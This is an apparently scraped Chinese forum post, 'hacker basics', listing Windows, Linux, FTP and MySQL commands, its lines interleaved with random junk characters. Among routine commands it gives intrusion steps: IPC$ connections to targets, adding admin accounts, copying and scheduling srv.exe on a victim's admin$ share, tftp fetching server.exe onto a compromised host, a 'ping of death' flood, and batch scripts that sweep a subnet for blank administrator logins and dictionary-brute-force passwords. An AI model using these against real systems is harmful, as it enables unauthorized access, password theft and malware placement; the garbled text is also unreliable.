黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
* c- [+ u' b4 R* ?, l& }. M/ w$ }! T$ E2 Hnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
  }9 E7 g" D% ]% knet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
$ S" q" Z- @6 g1 `, f" Z0 y& Jnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 7 S6 L; Q. E5 h$ n! Y4 I, ?
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 - _4 D2 h9 j. f8 P
net use h: /del 删除映射对方到本地的为H:的映射
: Q9 E% x7 X' I# m; Q) O, H) Snet user 用户名　密码　/add 建立用户
# b  W/ G9 t+ y3 h9 I, qnet user guest /active:yes 激活guest用户 9 l) n- H5 D% e8 _( u# f* X
net user 查看有哪些用户 ( F6 {$ v6 m2 o6 N
net user 帐户名 查看帐户的属性
# K! d2 C) b; y& Q. B( t9 dnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
) n( `2 _0 u. [, Wnet start 查看开启了哪些服务
& J* M- k& v8 l/ unet start 服务名　 开启服务；(如:net start telnet， net start schedule)   b  K* l9 Z# J( v# `. F; `6 o" f
net stop 服务名 停止某服务
6 K, K! `2 R: ?/ e0 Znet time \\目标ip 查看对方时间 $ d% J) o5 Y6 r7 u* [+ L7 f
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ' S  g' _% A& _+ z1 f- g
net view 查看本地局域网内开启了哪些共享
- l  @" J5 r! k2 m! h) c8 e  Gnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
! H, X4 x& W# b0 e# b: snet config 显示系统网络设置
) S& ~+ x5 M* i  q% Q2 a5 Qnet logoff 断开连接的共享 * ^& q) @5 C* L4 F+ Z+ ]
net pause 服务名 暂停某服务
9 P% `$ y! a) s+ o" F! x6 ~9 nnet send ip "文本信息" 向对方发信息 9 R; |3 I) B) u2 k3 W. A, K
net ver 局域网内正在使用的网络连接类型和信息
$ e# M* h, I- n. n5 X+ e, @1 d  qnet share 查看本地开启的共享 ; h1 i! W1 d9 D( f, b! Z4 O
net share ipc$ 开启ipc$共享
6 \" P1 j* t3 g( Q, e; @" wnet share ipc$ /del 删除ipc$共享
% B; d- h4 ]% vnet share c$ /del 删除C：共享
9 `. J& k( c9 f- [+ U+ N6 Nnet user guest 12345 用guest用户登陆后用将密码改为12345
4 V+ `8 J6 |7 `2 F5 Y' snet password 密码 更改系统登陆密码
. A9 M+ b/ x( j3 ^' knetstat -a 查看开启了哪些端口,常用netstat -an 1 J/ x: I7 ^6 C1 R( e
netstat -n 查看端口的网络连接情况，常用netstat -an ( Z0 D- N7 `' r9 _, b9 k1 ^. U
netstat -v 查看正在进行的工作   {* c$ N' P4 a
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）   \* R! j; k2 q5 J* A# c
netstat -s 查看正在使用的所有协议使用情况 % x. N2 {9 j% N' d4 G
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写   r; u2 x2 p7 ?$ a
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 $ D  Z9 ~' ]0 H* {( p
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 6 i3 k' ?( V# ~' n! i% ~
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
- H# h6 q3 O  [7 I( A( l; _% kipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
2 Q( `. Z& A, _# n* K. Ltlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
& U4 Q0 F' ^0 o8 o+ _kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
# z7 @+ M  `& u$ fdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 ; j$ L, S' A8 g3 J7 j
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） + j) u, I9 @! w# I" \
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
8 u8 A4 c+ D) ?/ }( _. m' Kfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
+ n# U8 r2 c$ [3 i8 }at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
0 _6 f; P0 C8 j) x' q, u7 Sat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
7 I) [& d, L) Dat id号 /delete 停止某个已注册的计划任务 4 _& M2 U; C) N; @/ Z' d
at 查看所有的计划任务 % O5 v& o! c1 O
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 9 w2 U( \$ Z% c5 q  z/ n8 z/ j9 r$ {
finger username @host 查看最近有哪些用户登陆   |1 A% z3 [" {; r+ o# t% |' F8 ^) Q
telnet ip 端口 远和登陆服务器,默认端口为23
# N2 x) b5 h+ b+ D# B2 Ropen ip 连接到IP（属telnet登陆后的命令）
* R$ l9 F4 u5 @6 N; B! R9 ytelnet 在本机上直接键入telnet 将进入本机的telnet
+ s4 ~6 Z& B' b7 F) X( Y1 [; @  Ucopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 , K3 H, f7 U( P: u5 V
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 $ @6 D; E- ~# `( S) I
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 : \9 p# a3 a+ p% |
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
% q; H: G. E9 a2 m; dxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 7 v3 s$ N( R) D( [( t9 s7 }. _
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
# ?7 U! w/ Z* x8 b5 Xtftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
# Y0 f- h* ~6 `' ~- h0 pftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
- b( u1 z6 o9 q% |6 `route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface / a+ y( u) v" a$ q9 x* V( K
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 7 i  ]& B! ?. B# ~5 z: s
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
! l& |; }9 j6 b- Q& U3 amem 查看cpu使用情况
  b+ ]  w8 H/ eattrib 文件名(目录名) 查看某文件（目录）的属性
# t# A/ u( E" }attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
7 ~, F4 O; F3 idir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
- |+ V* _  L0 U% gdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 : V% _  e: A2 I! l
set 指定环境变量名称=要指派给变量的字符 设置环境变量
6 s( G: ^& a. M  @' G9 Jset 显示当前所有的环境变量
- @8 w- m: {  V+ U: K. |set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
2 @( ~+ U) u* L' ?& Upause 暂停批处理程序，并显示出：请按任意键继续.... ( n0 d4 M; u3 i
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
' J% ^4 U( I2 ?3 D4 K1 c" u# D$ Wgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
. I3 J- G, v: M: m5 N9 Ncall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
3 S" _  ^6 O( @% D# E( j( s( vfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 4 g# F8 l1 y3 J+ p; O
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 : B( ^0 K5 V/ y- \
echo 信息 在屏幕上显示出信息
; @# e# a2 T% I$ F6 techo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 ! g' o, W% j6 v4 P  z! X& k
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello . e4 M! |/ _0 L3 T0 V- X2 V* V/ y
find 文件名 查找某文件 5 Q( y! r1 ~) ~* t
title 标题名字 更改CMD窗口标题名字
1 q8 L9 E" D- ecolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
1 K( v. z7 ]& t& q/ D5 F9 bprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
! A7 }) g* n7 B( Bprint 文件名 打印文本文件 , ^% o; w7 v; X+ i$ W# B2 m, N
ver 在DOS窗口下显示版本信息 7 t- L& P* L; c9 r9 O6 `) B
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
) K. @. W5 I7 U' ~2 Q; Gformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS " l+ U! L4 J' j. j
md　目录名 创建目录
/ d3 F' J) w$ W. z/ X- a% `replace 源文件　要替换文件的目录 替换文件 7 X) Z7 R/ [! J2 c4 X
ren 原文件名　新文件名 重命名文件名
. \7 |8 h$ R# P% H+ Z. N8 ~tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 6 L& A* l, y6 \5 L  V) x
type 文件名 显示文本文件的内容
: G- P4 ~) ~4 R/ d' dmore 文件名 逐屏显示输出文件
1 J$ B/ x0 i) Z. U& Ldoskey 要锁定的命令＝字符
* B$ \# W+ F$ w' Udoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
" ]# R) o1 H- Y$ k' A4 d) u2 j- _taskmgr 调出任务管理器
* Q+ ?8 [8 e3 p$ e5 }" I; [chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
9 F! Q$ _5 {  E" {+ \8 stlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
: \. c0 R6 C1 b( I* Zexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe - a0 ^* }6 s1 t! q" O" @! _
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
* L  ~" a# O! U, B% J3 T+ Tcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? . u7 ?& a+ F$ @
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
' |% H% W: T4 E; H* y- Cregedit /e 注册表文件名 导出注册表 ) p( D/ q% C7 ]* `" w) V
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
  X; S( B* H3 Q* O. t1 Scacls 文件名 查看文件的访问用户权限列表 & }$ q: N: ^( f0 Z( Z) W6 l7 |8 F
REM 文本内容 在批处理文件中添加注解 ! m6 @6 D& T( k. b- M
netsh 查看或更改本地网络配置情况
2 ~% z: y2 d% C, _6 fIIS服务命令：
) ^3 ~! v9 ]( }4 wiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
% `+ p2 U1 L5 M6 I* ciisreset /start或stop 启动（停止）所有Internet服务   W1 G: ^& U4 m; g
iisreset /restart 停止然后重新启动所有Internet服务 4 p2 d. P  k0 r6 R; x8 n" X* V) d' E
iisreset /status 显示所有Internet服务状态
1 O* ^* M/ [8 ^* p. w  K1 iiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 ) q2 x5 `4 b4 `9 y6 L1 i
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 $ [6 ^7 u( R) ~3 I: S
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
- A% D) ?+ L6 n/ n( q! n& U9 N- giisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
3 D0 j# a* X4 Y4 ?; n7 U8 OFTP 命令： (后面有详细说明内容)
* Z: @# d: _) x! H2 rftp的命令行格式为:  `. a2 K6 N5 g
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
& K1 ~* c  u0 D' X0 }- z' n) ]－d 使用调试方式。 & p$ e, n7 e& V9 G; O
－n 限制ftp的自动登录,即不使用.netrc文件。/ x1 }5 B/ e% X2 f6 v' W9 g0 B
－g 取消全局文件名。 * l7 Q' {  L5 d3 [$ M+ m3 _
help [命令] 或 ？[命令] 查看命令说明 4 I8 B+ ^8 X, ?% M6 s- S' d0 ^: c' Q, ^
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 4 q% c5 S5 j* H: Z  O
pwd 列出当前远端主机目录
4 A7 Z& O9 l4 b* Hput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 ( t: J6 ?0 D' |* S3 i  a
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 6 N0 Z2 P0 n% w4 w0 a8 O9 M9 m* H( y
mget [remote-files] 从远端主机接收一批文件至本地主机
6 w1 J( ?% j0 H7 [mput local-files 将本地主机中一批文件传送至远端主机
! k& b$ E) n) Bdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 + \6 Y' [$ t7 g# d3 J+ X, y
ascii 设定以ASCII方式传送文件(缺省值) 2 |8 S( H# o4 b
bin 或 image 设定以二进制方式传送文件
" ?2 V" f1 B$ hbell 每完成一次文件传送,报警提示 " _" _  O* T3 c. d2 m2 ?8 ?/ ^
cdup 返回上一级目录 . w# o% Y; u  U6 W- b( z
close 中断与远程服务器的ftp会话(与open对应)
  s& n% w& g9 }# D4 f& S) K  Xopen host[port] 建立指定ftp服务器连接,可指定连接端口
4 ^7 Z) Y7 f, |$ u: vdelete 删除远端主机中的文件
% _, |2 u4 ^0 O# M- [+ y6 {mdelete [remote-files] 删除一批文件 ; U0 V& U9 Z' t. ?, ^4 r5 I
mkdir directory-name 在远端主机中建立目录
. Y8 _5 O" |9 o, u: mrename [from] [to] 改变远端主机中的文件名 * B6 P1 V: o( Y# N4 h9 O
rmdir directory-name 删除远端主机中的目录
5 O% V  j: b, h7 l6 w0 t  j8 Kstatus 显示当前FTP的状态 + W: c! R$ P" ?! g% F7 W
system 显示远端主机系统类型
2 d0 h  p" z% f; B5 M* ]2 xuser user-name [password] [account] 重新以别的用户名登录远端主机 5 L& X. P1 c1 F( s7 i( Q
open host [port] 重新建立一个新的连接
; z5 G6 z5 M, Y  m5 l; eprompt 交互提示模式
+ m; G5 h) I& W, x" f$ q& A5 bmacdef 定义宏命令
4 I& P4 d4 c* E, k: @" N  p! m2 [# y' [lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
5 b: {2 f2 `5 vchmod 改变远端主机的文件权限 0 N& N& r  v9 b; w
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
1 L) q; g- c0 M, @) u; Icd remote－dir 进入远程主机目录 4 T! w4 {  L8 A: f5 F( J
cdup 进入远程主机目录的父目录 " m6 I5 d+ O, G5 [. \  J! D: L. O
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
4 \/ N: d; n# K3 ]+ aMYSQL 命令： / z4 b5 L, V" V9 T" J
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
7 K! Y- [$ r0 O（例：mysql -h110.110.110.110 -Uroot -P123456
- o& B7 e0 d+ a' ]4 V! k注:u与root可以不用加空格，其它也一样） , W  z+ S' x* e3 _* Q# c+ G7 f  n" V. k
exit 退出MYSQL " y4 ]0 _& w* D* O& I
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
5 u3 Y  `5 v5 f3 [1 s2 A/ rgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） ' B; j" c$ R  {# |9 U3 S
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 . ], i* G: G$ ~( C
use mysql；2 m  d" ^0 c5 o$ g7 e6 y4 F
show tables; 显示库中的数据表
' ?/ O$ P4 b0 S, @; d" t% G$ Qdescribe 表名; 显示数据表的结构
! v4 ]" u4 `) gcreate database 库名; 建库
1 @+ Q* P' J: ?  B7 A" Zuse 库名；0 g$ E! O- O) ~" |. K9 m( w5 o% l& `
create table 表名 (字段设定列表)； 建表 * p) ^; W0 d5 |! X# \
drop database 库名; 1 O3 D" N& u# f* [% K& q1 ?
drop table 表名； 删库和删表 - @" }9 c; x8 @- }. A
delete from 表名; 将表中记录清空
% {/ V6 u. n' q- aselect * from 表名; 显示表中的记录
8 A* K6 I4 K9 h4 I1 G/ L* xmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 / c% C  p2 Z# n( G" K$ {- a
win2003系统下新增命令（实用部份）：
+ f/ o* P" e/ C' f7 l, ~shutdown /参数 关闭或重启本地或远程主机。0 z, d4 q  R' b% Q. {% u; l; q
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
2 C0 o/ q" ]: t3 l. Z: h, \# S& m9 A1 [例：shutdown /r /t 0 立即重启本地主机（无延时）
: U( J) l9 [/ w0 E- C3 Htaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
" ^* \2 {+ q( y/ x8 D参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 6 w1 w$ a6 n9 G* [
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。: q; r; p' \$ r2 g) ^( P9 J
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
& D& h6 Z4 z" yLinux系统下基本命令： 要区分大小写- `# U9 _; l4 V% t3 V) w5 J: k
uname 显示版本信息（同win2K的 ver） ) b1 t# m8 I' K- A9 R# {
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
8 k! N! I' P( V2 I! X! X$ B& L! |- q. Kpwd 查询当前所在的目录位置
9 K! Z- Y& \9 a% |- H5 P2 F" mcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
: d# m. e5 v  Y" w" P9 e1 c+ Z4 |5 q& C4 lcat 文件名 查看文件内容
* q: Y( C, F+ L0 s2 [cat >abc.txt 往abc.txt文件中写上内容。 0 M5 K2 J1 u$ H4 g+ R
more 文件名 以一页一页的方式显示一个文本文件。
$ X6 b" j# U+ A+ z+ z4 bcp 复制文件 + }4 B; t: w+ \# b$ I5 |) G
mv 移动文件
* J7 P! e9 L- q) A/ A) crm 文件名 删除文件，rm -a 目录名删除目录及子目录 ! d: S+ [2 ^* `. V( w2 t
mkdir 目录名 建立目录
/ ]$ d7 F$ M8 Q: j6 {2 mrmdir 删除子目录，目录内没有文档。
4 {6 b* z7 _: i% G, |chmod 设定档案或目录的存取权限
5 [3 W" Y9 T! I, F) l- Wgrep 在档案中查找字符串 * o: J( q4 X6 c# ^9 U
diff 档案文件比较
: H, N) [- a6 F6 f4 ofind 档案搜寻
- }: @& {: `$ @) U5 w: a7 Z9 ndate 现在的日期、时间
* R' O4 W0 [* k! y% E, Twho 查询目前和你使用同一台机器的人以及Login时间地点
' U* o& H4 D3 R( p% }! t/ L; ?w 查询目前上机者的详细资料 ' n5 }" Y( d" {2 g# w" F
whoami 查看自己的帐号名称
; o7 k' w9 j; U3 A6 Pgroups 查看某人的Group
) L2 j+ H8 Q/ t0 dpasswd 更改密码 7 E) x( A  g. Q. P  D) ^
history 查看自己下过的命令 7 k  m4 a$ a1 V4 S% M! t
ps 显示进程状态 ' N. w3 _3 l& y4 A( H
kill 停止某进程 ( G# ^8 T$ N7 h( x$ G) y6 T  V" j) y. `
gcc 黑客通常用它来编译C语言写的文件
7 e% j7 x) l; Nsu 权限转换为指定使用者
9 b$ e5 M% Q. o- U& E# f" H1 Stelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
5 U: V1 c: P9 a. j; uftp ftp连接上某服务器（同win2K
$ b1 K7 @: b' D$ r! A1 `附：批处理命令与变量2 M, i9 b" R6 b3 h/ D
1：for命令及变量 基本格式：
8 W' X$ b" f7 M+ s- HFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。8 v  }% ]  J; }  t" j& S: S! e6 D
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
& y2 D7 Q( O* _8 V' X6 l! g% [(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}8 u3 c4 U) f8 x$ S5 I+ P
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开+ j+ B/ r% l- v% t
command_parameters：为特定命令指定参数或命令行开关+ I1 k: s) x) I
IN (set)：指在(set)中取值；DO command ：指执行command* B$ Y+ a% o- d0 ], z3 H! M: C" ^
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 $ t- m( Y  W' y" s7 N1 n+ @* E
用法举例：
0 o4 X) a% Z% G: t+ `# n@echo off
. W/ Q2 m: L/ u- f( p- t6 Y# Aecho 用法格式：test.bat *.*.* > test.txt
- z! r& u4 X% v2 [8 H2 zfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
. Q% y8 E' c6 F( E. u2 `6 a. g) u存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。( P% j6 w* D1 o3 a) W
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 3 e0 d2 L% U+ p: v7 F8 R: ~
@echo off + F7 v4 L5 a# n- ^
echo 用法格式：ok.bat ip
) v' U! A2 N0 I2 BFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
) R4 A5 H! c* \3 _9 Y0 r存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。4 `- U7 Y5 x  Y- o1 S
2：if命令及变量 基本格式：
" e" A: m2 d  s7 X! ^, tIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
$ S# V& y5 x4 E; `8 }: V4 f2 [: g例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
5 F- x# O1 [! O" ]0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
9 ^0 X8 E7 i9 ?; k$ CIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。8 U. R; X& }- q* U9 h
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
5 n' P- H, T3 D. F! r. qIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。' S1 w3 F! ~$ g; C' s! S  F: x! w
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 ) ]5 \1 W2 y! s" V) O* a
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”